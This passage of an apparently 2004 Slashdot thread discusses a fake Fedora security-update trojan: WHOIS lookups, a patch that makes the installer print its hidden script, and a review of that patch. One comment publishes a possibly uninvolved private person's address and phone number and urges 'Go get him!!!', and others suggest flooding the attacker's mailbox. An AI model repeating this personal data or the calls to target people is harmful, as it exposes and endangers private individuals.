    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: ADDLEBRAIN.COM

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
  31. fedora-redhat.com DNS WHOIS query... by ScottKin · · Score: 0, Informative

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    Have fun!

    --ScottKin

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
  32. Re:Christ, they didn't do a very good job... by harlows_monkeys · · Score: 3, Informative
    Neither Red Hat nor Fedora Legacy provide security updates for 7.3 and 9

    Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.

  33. link to a translation by danalien · · Score: 2, Informative

    here is a slashdot user who has translated it.

    --
    I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
  34. Neutering the trojan by Anonymous Coward · · Score: 1, Informative

    The following patch will cause the program to print out the embedded script rather than execute it, so that you may see what it is trying to do:

    --- inst.c Sat Oct 23 11:02:12 2004
    +++ inst.c.harmless Sun Oct 24 22:00:27 2004
    @@ -378,8 +378,12 @@
    return 0;
    memset(scrpt, (int) ' ', sizeof(hide_t));
    memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
    + printf("%s\n", scrpt);
    + exit(0);
    } else {
    scrpt = text; /* Script text */
    + printf("%s\n", scrpt);
    + exit(0);
    }
    } else { /* Reexecute */
    if (*xecc) {
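    Review bot: the added printf/exit(0) pair covers only the two branches that fill scrpt; the `} else { /* Reexecute */` path immediately below is untouched, so the neutered binary is safe only if the first run never takes that path (busonerd's post says inst re-executes itself through /bin/sh, so check which branch a fresh run reaches before trusting the build). Also, the first branch prints scrpt right after the whole hide_t buffer was memset to spaces, so the script appears behind sizeof(hide_t) - sizeof(text_t) leading blanks; `printf("%s\n", text);` or printing from `&scrpt[sizeof(hide_t) - sizeof(text_t)]` gives the script on its own.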

  35. Re:I'll try it... by hattmoward · · Score: 2, Informative

    Generally an every-port-open result from nmap indicates use of a firewall. Watchguard's products tend to do that, and iptables can be made to do similar also.

  36. From the WHOIS: by Anonymous Coward · · Score: 3, Informative

    I looked at the whois... fedora-redhat.com reported:

    Raymond Jackson
    224 Cedar Avenue
    New York, NY 95301.
    209 899-4533 However, 95301 is an Atwater, CA zip code.

    So, I looked up Raymond Jackson in Atwater. What did I find?


    Raymond Jackson
    224 Cedar Avenue
    Atwater, CA 95301
    209 358 8510.

    Looks like he did a crappy job of disguising his identity. Go get him!!!

  37. dont bother wasting your time.... by Indy1 · · Score: 2, Informative

    host fedora-redhat.com
    fedora-redhat.com has address 66.218.79.149
    fedora-redhat.com has address 66.218.79.155
    fedora-redhat.com has address 66.218.79.147
    fedora-redhat.com has address 66.218.79.148

    whois 66.218.79.149

    OrgName: Yahoo!
    OrgID: YAOO
    Address: 701 First Avenue
    City: Sunnyvale
    StateProv: CA
    PostalCode: 94089
    Country: US

    NetRange: 66.218.64.0 - 66.218.95.255
    CIDR: 66.218.64.0/19

    Trying to ddos yahoo won't get you very far : )

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  38. Re:About Time by Kenja · · Score: 2, Informative
    "it happens on every platform

    hasn't happened on my SGI yet.

    --

    "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
  39. Full decryption of the shell script by moyix · · Score: 3, Informative

    Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.

  40. fake security update - update by sgrayban · · Score: 1, Informative

    Site Temporarily Disabled

    This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

    Seems someone has gotten smart on it and turned the site off .......

    Hope the fuckers get nailed for it.

  41. Re:I'll try it... by SynKKnyS · · Score: 2, Informative

    Argh, notice it is an IIS server. And, notice that they offer free email. Put the two together. Someone registered the username "root" apparently. Tricksy.

  42. Re: I'll try it... Execution results! by KarmaPolice · · Score: 3, Informative
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    Been there, done that:
    <root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
    Recipient Rejected: Not accepting mail for this account : Account
    terminated due to violation of user agreement

    ...the system works!